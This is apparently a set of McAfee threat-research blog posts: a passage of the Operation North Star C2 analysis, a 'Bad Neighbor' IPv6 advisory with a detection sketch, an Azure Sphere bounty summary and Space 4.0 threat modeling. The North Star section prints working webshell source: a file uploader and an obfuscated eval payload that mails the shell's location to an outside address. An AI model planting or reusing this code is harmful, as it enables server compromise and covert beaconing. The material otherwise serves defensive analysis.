They are sent to the backend server through the NED parameter as covered earlier; further, they are read and interpreted by the ASP code.

Victimology

According to the raw access logs for Inc-Controller-News.asp, it is possible to understand which countries were impacted, and this matches the logs we discovered alongside another ASP page (view.asp), which we explain later in this document.

Based on one of the C2 log files, we could identify the following about the victims:

  • Russian defense contractor
  • Two IP addresses in two Israeli ISP address spaces
  • IP addresses in Australian ISP space
  • IP address in Russian ISP address space
  • India-based defense contractor

Template-letter.asp

During our investigation we uncovered information that led to the discovery of additional ASP pages. One ASP page, discovered on the same compromised command and control server, contained interesting code. First, this ASP page is encoded in the same method, using VB.Encode, as we observed with the code that delivers the Torisma implant. Second, it appears that the code is part of the core backend managed by the attacker and had the original file name board_list.asp. Based on in-the-wild submission data, the file board_list.asp first appeared in Korea in October 2017, suggesting the code for this webshell has been in use since 2017.

Further, this ASP page is a custom webshell that, according to our knowledge and sources, is not an off-the-shelf common webshell, but rather something specifically used in these attacks. Some of the actions include browsing files, executing commands, connecting to a database, etc. The attacker is presented with a login page, and a default Base64 encoded password of ‘venus’ can be used to log in (this value is hardcoded in the source of this page).

Template-Letter.ASP main page

Functionality to execute commands

 VIEW.ASP -Torisma Backend

The View.ASP file is as important as the inc-controller-news.asp file and contains interesting functionality. This ASP page is the backend code for the Torisma implant, and its functions are intended to interact with the infected victim.

The view.asp file contains the following references in the code:

The file “FOUND001.CHK” contains a log file, as its CONST value name “logvault” suggests.

Analyzing the possible victims revealed an interesting list:

  • Russia-based defense contractor
  • Two IP addresses in two Israeli ISP address spaces
  • IP address in Russian ISP address space
  • India-based defense contractor

The file “FOUND002.CHK” contains a Base64 string that decodes to:

hxxps://www.krnetworkcloud.org/blog/js/view.php|www.krnetworkcloud.org|2|/blog/js/view.php|NT

The above domain was likely compromised to host malicious code, given it belongs to an Indian IT training company.

The CONST value name for “FOUND002.CHK” is “cfgvault”; the first three letters likely refer to “configuration”. This ASP code contains additional functions that indicate what role this page has in the overall scheme. View.asp is the Torisma implant backend code, with numerous functions implemented to handle requests from the implant as described earlier in this analysis. Based on our analysis of both the Torisma implant and this backend code, some interesting insight has been discovered. First, implemented in the ASP code are the general actions that can be taken by this backend, depending on the interaction with Torisma.

Some of these actions are triggered by the implant connecting, and others may be invoked by another process. The main ASP page is implemented to handle incoming requests based on a request ACTION, with several possible options to call. Given that the implant is driven by the “ACTION” method when it comes to C2 communication, a number of these cases could be selected. However, we only see code implemented in Torisma to call and handle the request/response mechanism for NEXTPAGE and PREVPAGE; the other actions are likely performed by the adversary through some other process.

General actions by View.ASP

ViewPrevPage

As described in the analysis, the ViewPrevPage action is a function designed to handle incoming requests from Torisma to get data. The data sent to Torisma appears to be in the form of ~dmf files. The content for the ViewPrevPage action comes in the form of shellcode intended to be executed on the victim side, according to the analysis of the implant itself.

ViewPrevPage function

ViewNextPage

Torisma uses this method to send data, read from the named pipe, back to the C2 server. This is the result of the execution of the shellcode on the victim’s system through the ViewPrevPage action, and the results of this execution are sent and processed using this function.

Implant sends data to C2

ViewGallery

There is no function in Torisma implemented to call this function directly; it is likely called from another administration tool, probably implemented in the upstream server. A static analysis of this method reveals that it is likely intended to retrieve log files in a Base64 encoded format and write the response. As with the Torisma implant, there is a response string received by the calling component that indicates the log file has been retrieved successfully and should then be deleted.

Retrieve and write log file content in base64 format (ViewGallery)

ViewMons

Another function also not used by Torisma is intended to set the local configuration file. It appears to use a different request method than ACTION; in this case it uses MAILTO. Based on insight gathered from Torisma, we can speculate this is related to configuration files that are used by the implant.

ViewMons function

SendData

This function is used in the RedirectToAdmin method exclusively and is the mechanism for sending data to the upstream C2. It depends on the GetConfig function that is based on the stored value in the cfgvault variable.

Send Data

RedirectToAdmin

This function is used to redirect information from an infected victim to the master server upstream. This is an interesting function indicating additional infrastructure beyond the immediate C2 with which we observed Torisma communicating.

RedirectToAdmin

WriteAgentLog

As part of the process of tracking victims with Torisma, the ASP code has a function to write log files. These log files indicate successful execution of shellcode on victims running Torisma. This logging method captures the user agent and IP address associated with the victim being monitored. This function is called when the information is sent to the master server via the RedirectToAdmin method.

Analysis of the server logs indicates the following countries made connections to the View.ASP page in July 2020.

  • India
  • Australia
  • Israel
  • Finland

Webshells

During our analysis we were able to determine that, in some instances, the attacker used webshells to maintain access. Discovered on another server compromised by the same actor, with the same type of code, was a PHP webshell that our analysis indicates is a modified variant of Viper 1337 Uploader.

<title>Viper 1337 Uploader</title>
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
// Copy the uploaded file into the web root under its original name
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
    else { echo '<b>Not uploaded ! </b><br><br>'; }
}
?>

<?php
// Base64-encoded PHP that is executed at runtime
eval(base64_decode('JHR1anVhbm1haWwgPSAnS2VsdWFyZ2FIbWVpN0B5YW5kZXguY29tJzsKJHhfcGF0aCA9ICJodHRwOi8vIiAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CiRwZXNhbl9hbGVydCA9ICJmaXggJHhfcGF0aCA6cCAqSVAgQWRkcmVzcyA6IFsgIiAuICRfU0VSVkVSWydSRU1PVEVfQUREUiddIC4gIiBdIjsKbWFpbCgkdHVqdWFubWFpbCwgIkNvbnRhY3QgTWUiLCAkcGVzYW5fYWxlcnQsICJbICIgLiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXSAuICIgXSIpOw=='));
?>

Some additional log file analysis reveals that a DOTM file hosted with a .jpg extension was accessed by an Israeli IP address. This IP address likely belongs to a victim in Israel that executed the main DOCX. The user-agent string in these requests, Microsoft+Office+Existence+Discovery, indicates that the DOTM file in question was downloaded from within Microsoft Office (template injection).

Attacker Source

According to our analysis, the attacker accessed and posted a malicious ASP script “template-letter.asp” from the IP address 104.194.220.87 on 7/9/2020. Further research indicates that the attacker was operating from a service known as VPN Consumer in New York, NY.

Snippet from log file showing attacker IP 104.194.220.87

From the same logfiles, we observed the following User Agent String:

“Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+10.0;+Win64;+x64;+Trident/7.0;+.NET4.0C;+.NET4.0E;+ms-office;+MSOffice+16)”

Decoding the User Agent string, we can make the following statement:

The attacker is using a 64-bit Windows 10 platform and Office 2016.

The Office version is the same as we observed in the creation of the Word documents, as described in the document analysis portion of our Operation North Star research.

Conclusion

It is not very often that we have the chance to obtain the C2 server code pages and associated logging for analysis. Starting from our initial analysis of the first stage payloads, we were able to decode and reveal layer after layer, resulting in unique insights into this campaign.

Analysis of logfiles uncovered potential targets of which we were unaware following our first analysis of Operation North Star, including internet service providers and defense contractors based in Russia and India.

Our analysis reveals a previously unknown second stage implant known as Torisma which executes a custom shellcode, depending on specific victim profiles, to run custom actions. It also illustrates how the adversary used compromised domains in Italy and elsewhere, belonging to random organizations such as an auction house and printing company, to collect data on victim organizations in multiple countries during an operation that lasted nearly a year.

This campaign was interesting in that there was a particular list of targets of interest, and that list was verified before the decision was made to send a second implant, either 32- or 64-bit, for further and in-depth monitoring. The progress of the implants sent by the C2 was monitored and written to a log file that gave the adversary an overview of which victims were successfully infiltrated and could be monitored further.

Our findings ultimately provide a unique view into not only how the adversary executes his attacks but also how he evaluates and chooses to further exploit his victims.

Read our McAfee Defender’s blog to learn more about how you can build an adaptable security architecture against the Operation North Star campaign.

Special thanks to Philippe Laulheret for his assistance in analysis.

 

[1] https://www.ecrypt.eu.org/stream/p2ciphers/vest/vest_p2.pdf

[2] https://www.ecrypt.eu.org/stream/vestp2.html


CVE-2020-16898: “Bad Neighbor”

By Steve Povolny

CVE-2020-16898: “Bad Neighbor”

CVSS Score: 8.8

Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

Overview
Today, Microsoft announced a critical vulnerability in the Windows IPv6 stack, which allows an attacker to send maliciously crafted packets to potentially execute arbitrary code on a remote system. The proof-of-concept shared with MAPP (Microsoft Active Protection Program) members is both extremely simple and perfectly reliable. It results in an immediate BSOD (Blue Screen of Death), but more importantly, it indicates the likelihood of exploitation for those who can manage to bypass Windows 10 and Windows Server 2019 mitigations. The effects of an exploit that would grant remote code execution would be widespread and highly impactful, as this type of bug could be made wormable. For ease of reference, we nicknamed the vulnerability “Bad Neighbor” because it is located within an ICMPv6 Neighbor Discovery “Protocol”, using the Router Advertisement type.

Vulnerability Details
A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets that use Option Type 25 (Recursive DNS Server Option) and a length field value that is even. In this Option, the length is counted in increments of 8 bytes, so an RDNSS option with a length of 3 should have a total length of 24 bytes. The option itself consists of five fields: Type, Length, Reserved, Lifetime, and Addresses of IPv6 Recursive DNS Servers. The first four fields always total 8 bytes, but the last field can contain a variable number of IPv6 addresses, which are 16 bytes each. As a result, the length field should always be an odd value of at least 3, per RFC 8106:

When an IPv6 host receives DNS options (i.e., RDNSS and DNSSL
options) through RA messages, it processes the options as follows:

   o  The validity of DNS options is checked with the Length field;
      that is, the value of the Length field in the RDNSS option is
      greater than or equal to the minimum value (3) and satisfies the
      requirement that (Length - 1) % 2 == 0.

When an even length value is provided, the Windows TCP/IP stack incorrectly advances the network buffer by an amount that is 8 bytes too few. This is because the stack internally counts in 16-byte increments, failing to account for the case where a non-RFC compliant length value is used. This mismatch results in the stack interpreting the last 8 bytes of the current option as the start of a second option, ultimately leading to a buffer overflow and potential RCE.

It is likely that a memory leak or information disclosure bug in the Windows kernel would be required in order to build a full exploit chain for this vulnerability. Despite this, we expect to see working exploits in the very near future.

Threat Surface
The largest impact here will be to consumers on Windows 10 machines, though with Windows Updates the threat surface is likely to be quickly minimized. While Shodan.io shouldn’t be counted on as a definitive source, our best queries put the number of Windows Server 2019 machines with IPv6 addresses in the hundreds, not exceeding approximately 1,000. This is likely because most servers are behind firewalls or hosted by Cloud Service Providers (CSPs) and not reachable directly via Shodan scans.

Detection
We believe this vulnerability can be detected with a simple heuristic that parses all incoming ICMPv6 traffic, looking for packets with an ICMPv6 Type field of 134 – indicating Router Advertisement – and an ICMPv6 Option field of 25 – indicating Recursive DNS Server (RDNSS). If this RDNSS option also has a length field value that is even, the heuristic would drop or flag the associated packet, as it is likely part of a “Bad Neighbor” exploit attempt.
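A minimal sketch of this heuristic using scapy (assumed available) is shown below; the interface name is a placeholder, and production detection logic, such as our Suricata rules, must additionally handle fragmentation and evasion cases.

from scapy.all import sniff
from scapy.layers.inet6 import ICMPv6ND_RA, ICMPv6NDOptRDNSS

def suspicious_ra(pkt) -> bool:
    # Type 134 (Router Advertisement) carrying an RDNSS option (type 25)
    if not pkt.haslayer(ICMPv6ND_RA):
        return False
    opt = pkt.getlayer(ICMPv6NDOptRDNSS)
    while opt is not None:
        if opt.len % 2 == 0:  # RFC 8106: length must be odd and >= 3
            return True
        opt = opt.payload.getlayer(ICMPv6NDOptRDNSS)
    return False

sniff(iface="eth0", filter="icmp6",
      prn=lambda p: print("possible Bad Neighbor attempt") if suspicious_ra(p) else None)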

Mitigation
Patching is always the first and most effective course of action. If this is not possible, the best mitigation is disabling IPv6, either on the NIC or at the perimeter of the network by dropping ICMPv6 traffic if it is non-essential. Additionally, ICMPv6 Router Advertisements can be blocked or dropped at the network perimeter. Windows Defender and Windows Firewall fail to block the proof-of-concept when enabled. It is unknown yet if this attack can succeed by tunneling the ICMPv6 traffic over IPv4 using technologies like 6to4 or Teredo. Our efforts to repeat the attack in this manner have not been successful to date.

For those McAfee customers who are unable to deploy the Windows patch, the following Network Security Platform (NSP) signatures will provide a virtual patch against attempted exploitation of this vulnerability, as well as a similar vulnerability (CVE-2020-16899). Unlike “Bad Neighbor”, the impact of CVE-2020-16899 is limited to denial-of-service in the form of BSoD.

NSP Attack ID: 0x40103a00 – ICMP: Windows IPv6 Stack Elevation of Privilege Vulnerability (CVE-2020-16898)
NSP Attack ID: 0x40103b00 – ICMP: Windows Function Discovery SSDP Provider Elevation of Privilege Vulnerability (CVE-2020-16899)

Additionally, we are releasing Suricata rules to detect potential exploitation of these vulnerabilities. Due to limitations in open source tools such as Snort and Suricata, we found that implementing the minimal detection logic described earlier required combining Suricata with its built-in Lua script parser. We have hosted the rules and Lua scripts at our public GitHub under CVE-2020-16898 and CVE-2020-16899 respectively. Although we have confirmed that the rules correctly detect use of the proof-of-concepts, they should be thoroughly vetted in your environment prior to deployment to avoid risk of any false positives.


Our Experiences Participating in Microsoft’s Azure Sphere Bounty Program

By Philippe Laulheret

From June to August, part of the McAfee Advanced Threat Research (ATR) team participated in Microsoft’s Azure Sphere Research Challenge. Our research resulted in reporting multiple vulnerabilities classified by Microsoft as “important” or “critical” in the platform that, to date, have qualified for over $160,000 USD in bounty awards scheduled to be contributed to the ACLU ($100,000), St. Jude’s Children’s Research Hospital ($50,000) and PDX Hackerspace (approximately $20,000). With these contributions, we hope to support and give back to our local hacker community that has really stepped up to help during the COVID crisis, and to recognize, at a larger scale, the importance of protecting and furthering civil liberties and the wellbeing of those most in need.

This blog post is a high-level overview of the program, why we chose to take part in it, and a brief description of our findings. A detailed technical walkthrough of our findings can be found here.

Additionally, Microsoft has released two summary blogs detailing the Azure Sphere Bounty Program as a whole, including McAfee’s efforts and findings. They can be found here:

MSRC Blog

Azure Sphere Core Team Blog

What is Azure Sphere and the Azure Sphere Research Challenge? 

In late May, Microsoft started a new bug bounty program for its Azure Sphere platform. Azure Sphere is a hardened IoT device with a secure communication link to the cloud that has been in development for the last few years and reached general availability in early 2020. Microsoft designed and built it from scratch to ensure every aspect of it is as secure as possible, per their security model. To put the theory to the test, Microsoft invited a few select partners and hackers to try their best to defeat its security measures.

The Azure Sphere team came up with multiple scenarios that would test the security model of the device and qualify for an increased payout over the regular Azure Bug Bounty program. These scenarios range from the ability to bypass certain security measures to executing code in the hardware-enabled secure core of the device.

Research scenarios specific to the Azure Sphere Research Challenge 

Why did ATR get involved with the program? 

There are multiple reasons why we were keen to participate in this program. First, as security researchers, the Azure Sphere platform is an exciting new research target that has been built from the ground up with security in mind. It showcases what might become of the IoT space in the next few years as legacy platforms are slowly phased out. Being at the forefront of what is being done in the IoT space ensures our research remains current and we are ready to tackle future new challenges. Second, by finding critical bugs in this new platform we help make it more secure and offer our support to make the IoT space increasingly resistant to cyber threats. Finally, as this is a bug bounty program, we decided from the start that we would donate any award we received to charity, thus using our skills to contribute to the social good of our local communities and support causes that transcend the technology sector.   

Findings 

We’ve reported multiple bugs to Microsoft as a result of our research that were rated Important or Critical: 

  • Important – Security feature bypass ($3,300): The inclusion of a symlink in an application package allows for referencing files outside of the application package mount point (this vulnerability class is sketched after this list). 
  • Critical – RCE ($48,000): The inclusion of a character device in an application package allows for direct interaction with a part of the flash memory, eventually leading to the modification of critical system files and further exploitation. 
  • Important – EoP ($11,000): Multiple bugs in how uid_map files are processed, allowing for elevation of privilege to the sys user.  
  • Important – EoP ($11,000): A user with sys privileges can trick the Application Manager into unmounting “azcore” and mounting a rogue binary in its stead. Triggering a core dump of a running process will then execute the rogue binary with full capabilities and root privileges due to improper handling of permissions in the LSM. 
  • Critical – EoP ($48,000): Further problems in the privilege dropping of azcore lead to a complete bypass of Azure Sphere capability restrictions. 
  • Critical – EoP ($48,000): Due to improper certificate management, it is possible to re-claim a device on the Azure Sphere pre-prod server and obtain a valid capability file that works in the prod environment. This capability file can be used to re-enable application development mode on a finalized device (claimed by a third party). The deployment of the capability file requires physical access to a device.  
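To make the symlink finding’s bug class concrete, below is a hypothetical Python sketch of the defensive check an extractor can apply. Azure Sphere’s application package format is not a tarball, so this illustrates only the general symlink-escape pattern, not the platform’s actual code; all names here are ours.

```python
import os
import tarfile

def safe_extract(package: str, dest: str) -> None:
    """Reject package members (including symlinks) that would escape dest."""
    root = os.path.realpath(dest)
    with tarfile.open(package) as tar:
        for member in tar.getmembers():
            # Validate the fully resolved path, not the raw name string.
            target = os.path.realpath(os.path.join(dest, member.name))
            if not target.startswith(root + os.sep):
                raise ValueError(f"path escape: {member.name}")
            if member.issym() or member.islnk():
                link = os.path.realpath(
                    os.path.join(os.path.dirname(target), member.linkname))
                if not link.startswith(root + os.sep):
                    raise ValueError(f"symlink escape: {member.name} -> {member.linkname}")
        tar.extractall(dest)
```

The point the finding demonstrates is that validation must happen against the resolved path, not against the path string as it appears inside the package.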

Conclusion 

This research was an exciting opportunity to look at a new platform with very little prior research, while still being in the familiar territory of an ARM device running a hardened Linux operating system.

Through the bugs we found, we were able to build a full-chain exploit from a locked device to root access. However, the Azure Sphere platform has many more security features, such as remote attestation and a hardware-enabled secure core, that are still holding strong.

Finally, we want to thank Microsoft for the opportunity to participate in this exciting program, and for the bounty awards.

The post Our Experiences Participating in Microsoft’s Azure Sphere Bounty Program appeared first on McAfee Blogs.

Securing Space 4.0 – One Small Step or a Giant Leap? Part 2

By Eoin Carroll

McAfee Advanced Threat Research (ATR) is collaborating with Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland.

In the first of this two-part blog series we introduced Space 4.0, its data value and how it looks set to become the next battleground in the defense against cybercriminals. In part two we discuss the architectural components of Space 4.0 to threat model the ecosystem from a cybersecurity perspective and understand what we must do to secure Space 4.0 moving forward.

Nanosats: Remote Computers in Space

A satellite is composed of a payload and a bus. The payload is the hardware and software required for the mission or the satellite’s specific function, such as imaging equipment for surveillance. The bus consists of the infrastructure or platform that houses the payload, such as thermal regulation and command and control. Small satellites are spacecraft typically weighing less than 180 kilograms, and within that class sit nanosatellites, or nanosats, which typically weigh between 1 and 10 kilograms. Cubesats are a class of nanosat, so you will often hear the terms used interchangeably; in the context of Space 4.0 security, we can treat them as the same device. Nanosats significantly reduce launch costs due to their small size and the fact that many of these devices can be mounted on board a larger single satellite for launch.

Commercial off-the-shelf (COTS) Cubesats typically use free open source software such as FreeRTOS or KubOS for the on-board operating system. However, other systems are possible, with drivers available for most of the hardware on Linux and Windows OS. KubOS is an open source flight software framework for satellites and has cloud-based mission control software, Major Tom, to operate nanosats or a constellation. We mention KubOS here as it is a good example of what the current Space 4.0 operating model looks like today. While we have not reviewed KubOS from a security perspective, developing a secure framework for satellites is the right path forward, allowing mission developers to focus on the payload.

Some of the use cases available with Cubesats are:

  1. File transfers
  2. Remote communication via uplink/downlink
  3. Intra-satellite and inter-satellite communications
  4. Payload services such as camera and sensors telemetry
  5. Software Updates

KubOS is “creating a world where you can operate your small satellite from your web browser or iPhone”. KubOS’ objective is to allow customers to send bits, not rockets, to space, and it is defining a new era of software-defined satellites. The satellite model is changing from relay-type devices to remote computers in space using COTS components and leveraging TCP/IP routing capabilities. This model shift also means that more software executes on these satellites, with more complex payload processing and interaction with the software stack, and hence more attack surface.

To date, attacks on satellite systems from a cybersecurity perspective have typically been in the context of VSAT terminals, eavesdropping and hijacking. While there have been vulnerabilities found in VSAT terminal software and its higher-level custom protocols, there appears to have been no focus on, and no vulnerabilities discovered within, the network software stack of the satellite itself. This may be because satellites have been very expensive and closed source, and therefore not accessible to security researchers or cybercriminals, but such security by obscurity will not provide protection in the new era of nanosats. Nanosats use COTS components which will be accessible to cybercriminals.

Due to the closed nature of satellites there has not been much published on their system hardware and software stack. However, the Consultative Committee for Space Data Systems (CCSDS), which develops standards and specifications including protocols for satellite communications, does give some insight. The CCSDS technical domains are:

  1. Space Internetworking Services
  2. Mission Ops. And Information Management Services
  3. Spacecraft Onboard Interface Services
  4. System Engineering
  5. Cross Support Services
  6. Space Link Services

The CCSDS standards are divided into color codes to distinguish recommended standards and practices from informational and experimental ones. This is a very large body of data communications material that satellite designers can use as an implementation reference. However, as we have observed across the cyber threat landscape of the past few decades, secure standards and specifications for hardware, software and protocols do not always translate into secure implementations. The CCSDS defines a TCP/IP stack suitable for transmission over space datalinks, as per figure 1 below. As satellites become more connected, their network and protocol software stacks will become more accessible and targeted, just like any other device on the internet. As we discussed in part 1 of our Space 4.0 blog series, there have been many TCP/IP and remote protocol related vulnerabilities in both embedded devices and even state-of-the-art operating systems such as Windows 10. TCP/IP stack and remote protocol implementations are a common source of vulnerabilities due to the complexities of parsing in memory-unsafe languages such as C and C++. There does not appear to be any open source implementation of the CCSDS TCP/IP protocol stack.

Figure 1 – CCSDS Space communications protocols reference model

The Cubesat Space Protocol (CSP) is a free open source TCP/IP stack implementation for communication over space datalinks, similar to the CCSDS TCP/IP stack. The CSP library is written in C, open source, and deployed in many Cubesats that have flown to space. The protocol can be used for communication from ground station to satellite, inter-satellite, and on the intra-satellite communication bus. Three vulnerabilities have been reported in this protocol to date.
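As a small illustration of why parsing is the risk area, the sketch below unpacks a CSP-style 32-bit header in Python with an explicit length check up front. The field layout is our reading of the public CSP 1.x documentation and should be treated as an assumption; the point is that the bounds and length checks that Python gives you automatically must be written by hand, correctly, in a C implementation.

```python
import struct

def parse_csp_header(frame: bytes) -> dict:
    """Parse a CSP 1.x-style 32-bit header (assumed layout, network byte order):
    priority(2) | source(5) | destination(5) | dest port(6) | src port(6) |
    reserved(4) | flags(4)."""
    if len(frame) < 4:  # the kind of check a C parser can easily omit
        raise ValueError("frame too short for CSP header")
    (hdr,) = struct.unpack("!I", frame[:4])
    return {
        "priority":    (hdr >> 30) & 0x3,
        "source":      (hdr >> 25) & 0x1F,
        "destination": (hdr >> 20) & 0x1F,
        "dest_port":   (hdr >> 14) & 0x3F,
        "src_port":    (hdr >> 8)  & 0x3F,
        "flags":        hdr        & 0xF,
        "payload":      frame[4:],
    }
```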

Figure 2 below shows what a Cubesat architecture looks like from a trust boundary perspective relative to the satellite and other satellites within the constellation and the earth.

Figure 2 – Space LEO Cubesat architecture trust boundaries

No hardware, software, operating system or protocol is completely free of vulnerabilities. What is important from a security perspective is:

  1. The accessibility of the attack surface
  2. The motives and capabilities of the adversary to exploit an exposed vulnerability if present in the attack surface

As these low-cost satellites are launched into LEO and become more connected, any exposed technology stack will become increasingly targeted by cybercriminals.

Space 4.0 Threat Modeling

This Space 4.0 threat model focuses on the cybercriminal and how they can exploit Space 4.0 data for monetization. The following Space 4.0 factors will make it more accessible to cybercriminals:

  1. Mass deployment of small satellites to LEO
  2. Cheaper satellites with COTS components and increased satellite on board software processing (no longer relay devices)
  3. Satellite service models, Ground Station-as-a-Service (GSaaS) and Satellite-as-a-Service (SataaS) and shared infrastructure across government, commercial and academic
  4. Satellite connectivity and networks in space (ISL – inter-satellite links)
  5. Space 4.0 data value

Space security has typically been analyzed from the perspective of ground segment, communications or datalink and space segment. Additionally, the attack classes have been categorized as electronic (jamming), eavesdropping, hijacking and control. Per figure 3 below, we need to think about Space 4.0 with a cybersecurity approach due to the increased connectivity and data, as opposed to the traditional approach of ground, communication and space segments. Cybercriminals will target the data and systems as opposed to the RF transmission layer.

Figure 3 – Space 4.0 threat modeling architecture

It is important to consider the whole interconnectivity of the Space 4.0 ecosystem, as cybercriminals will exploit any means possible, whether direct or indirect access (via another trusted component). Open source networked ground stations such as SatNOGS and the emerging NyanSat are great initiatives for space research, but we should consider them in our overall threat model as they provide mass connectivity to the internet and space.

The traditional space security model has been built on a foundation of cost as a barrier to entry and perimeter-based security due to lack of physical access and limited remote access to satellites. However, once a device is connected to the internet the threat model changes and we need to think about a satellite as any other device which can be accessed either directly or indirectly over the internet.

In addition, if a device can be compromised in space remotely or through the supply chain, then that opens a new attack class of space to cloud/ground attacks.

Users and trusted insiders will always remain a big threat from a ground station perspective, just like enterprise security today, as they can potentially get direct access to the satellite control.

The movement of ground services to the cloud is a good business model if designed and implemented securely; however, a compromise would impact the many devices in space controlled through the GSaaS. It is not yet clear where the shared responsibility starts and ends for the new SataaS and GSaaS Space 4.0 service models, but the satellite key management system (KMS), data, GSaaS credentials and analytics intellectual property (this may reside in the user’s environment, the cloud or potentially the satellite, but for the purposes of this threat model we assume the cloud) will be highly valued assets and targeted accordingly.

From the Cyber and Space Threat Landscape review in part 1, combined with our understanding of the Space 4.0 architecture and attack surfaces, we can start to model the threats in Table 1 below.

Table 1 – Space 4.0 threats, attack classes and layers, and attack vectors

Based on the above threat model, let’s discuss a credible attack scenario. From our space cyber threat landscape review in part 1 of this blog series, there were attacks on ground stations in 2008 at the Johnson Space Center and on a NASA research satellite. In a Space 4.0 scenario, the cybercriminal attacks the ground station through phishing to get access to satellite communications (it could also be a supply chain attack to get a known vulnerable satellite system into space). The cybercriminal uses an exploit sold on the underground market to exploit a wormable remote vulnerability within the space TCP/IP stack or operating system of the satellite, just as we saw EternalBlue being weaponized by WannaCry. Once the satellite has been compromised, the malware can spread between satellite vendors using their ISL communication protocol to propagate throughout the constellation. Once the constellation has been compromised, the satellite vendor can be held to ransom, causing major disruption to Space 4.0 data and/or critical infrastructure.

Moving Forward Securely for a Trustworthy Space 4.0 Ecosystem

Establishing a trustworthy Space 4.0 ecosystem is going to require strong collaboration between cyber threat research teams, government, commercial and academia in the following areas:

  1. Governance and regulation of security standards implementation and certification/validation of satellite device security capabilities prior to launch
  2. Modeling the evolving threat landscape against the Space 4.0 technology advancements
  3. Secure reference architectures for end to end Space 4.0 ecosystem and data protection
  4. Security analysis of the CCSDS protocols
  5. Design of trustworthy platform primitives to thwart current and future threats. This must start with a security-capable bill of materials (BOM) for both hardware and software, beginning with the processor and then the operating system, frameworks, libraries and languages, plus hardware-enabled security to achieve confidentiality, integrity, availability and identity, so that satellite devices can remain resilient when under attack
  6. Visibility, detection and response capabilities within each layer defined in our Space 4.0 architecture threat model above
  7. Development of a MITRE ATT&CK framework specifically for Space 4.0, as we observe real-world incidents, so that it can be used to strengthen the overall defensive security architecture using TTPs and threat emulation

Space 4.0 is moving very fast with GSaaS, SataaS and talk of space data centers and high-speed laser ISL; security should not be an inhibitor to time to market but a contributor, ensuring that we have a strong security foundation on which to innovate and build future technology with respect to the evolving threat landscape. Space communication predates the Internet, so we must make sure any legacy limitations that would restrict this secure foundation are addressed. As software complexity for on-board processing and connectivity/routing capability increases by moving to the edge (the space device), we will see vulnerabilities within Space 4.0 TCP/IP stack implementations.

This is a pivotal time for the secure advancement of Space 4.0, and we must learn from the mistakes of the past with IoT, where the rush to adopt new and faster technology resulted in large-scale deployment of insecure hardware and software. It has taken much effort and collaboration between Microsoft and the security research community since Bill Gates announced the Trustworthy Computing initiative in 2002 to arrive at the state-of-the-art Windows 10 OS with hardware-enabled security. Likewise, we have seen great advancements on the IoT side with the ARM Platform Security Architecture and Azure Sphere. Many security working groups and bodies have evolved since 2002, such as the Trusted Computing Group, the Confidential Computing Consortium, the Trusted Connectivity Alliance and the Zero Trust concept, to name a few. There are many trustworthy building-block primitives today to help secure Space 4.0, but we must leverage them at the concept phase of innovation, not once a device has been launched into space; the time is now to secure our next generation infrastructure and data source. Space security has not been a priority for governments to date, but that seems set to change with the “Memorandum on Space Policy Directive-5—Cybersecurity Principles for Space Systems”.

We should pause here for a moment and recognize the recent efforts from the cybersecurity community to secure space, such as the Orbital Security Alliance, S-ISAC, ManTech and the Defcon Hack-a-Sat.

KubOS is being branded as the Android of space systems and we are likely to see a myriad of new software and hardware emerge for Space 4.0. We must work together to ensure Space 4.0 connectivity does not open our global connectivity and infrastructure dependency to the next Mirai botnet or WannaCry worm on LEO.

McAfee would like to thank Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland for their collaboration in our mission to secure Space 4.0.

The post Securing Space 4.0 – One Small Step or a Giant Leap? Part 2 appeared first on McAfee Blogs.

Securing Space 4.0 – One Small Step or a Giant Leap? Part 1

By Eoin Carroll

McAfee Advanced Threat Research (ATR) is collaborating with Cork Institute of Technology (CIT) and its Blackrock Castle Observatory (BCO) and the National Space Center (NSC) in Cork, Ireland

The essence of Space 4.0 is the introduction of smaller, cheaper, faster-to-market satellites in low Earth orbit into the value chain and the exploitation of the data they provide. Space research and communication prior to Space 4.0 was primarily focused on astronomy and limited to governments and large space agencies. As technology and society evolve to consume the “New Big Data” from space, Space 4.0 looks set to become the next battleground in the defense against cybercriminals. Space 4.0 data can range from earth observation sensing to location tracking information, applied across the many vertical use cases discussed later in this blog. In the era of Space 4.0, the space sector is changing rapidly, with lower launch costs combined with public and private partnerships opening a whole new dimension of connectivity. We are already struggling to secure our data on earth; we must now understand and secure how our data will travel through space constellations and be stored in cloud data centers on earth and in space.

Low Earth Orbit (LEO) satellites are popular for scientific usage, but how secure are they? The Internet of Things (IoT) introduced a myriad of insecure devices onto the Internet due to the low cost of processors and high-speed connectivity, and the speed of its adoption resulted in a large fragmentation of insecure hardware and software across business verticals.

Space 4.0 is now on course for a similar rapid adoption with nanosats as we prepare to see a mass deployment of cheap satellites into LEO. These small satellites are being used across government, academic and commercial sectors for different use cases that require complex payloads and processing. Many nanosats can coexist on a single satellite. This means that the same satellite backbone circuit infrastructure can be shared, reducing build and launch costs and making space data more accessible.

To date, satellites have typically been relay-type devices, repeating signals to and from different locations on earth in regions with poor internet connectivity, but that is all set to change with a mass deployment of smarter satellite devices using inter-satellite links (ISL) in constellations like Starlink, which aim to provide full high-speed broadband global coverage. As the Space 4.0 sector moves from private and government hands to general availability, satellites become more accessible from a cost perspective, which will attract threat actors other than nation states, such as cybercriminals. Space 4.0 also brings with it new service delivery models such as Ground Station as a Service (GSaaS), with AWS and Azure Orbital, and Satellite as a Service (SataaS). With the introduction of these, the satellite will become just another device connecting to the cloud.

In our research we analyze the ecosystem to understand the latest developments and threats in relation to cybersecurity in space and whether we are ready to embrace Space 4.0 securely.

Space 4.0 Evolution

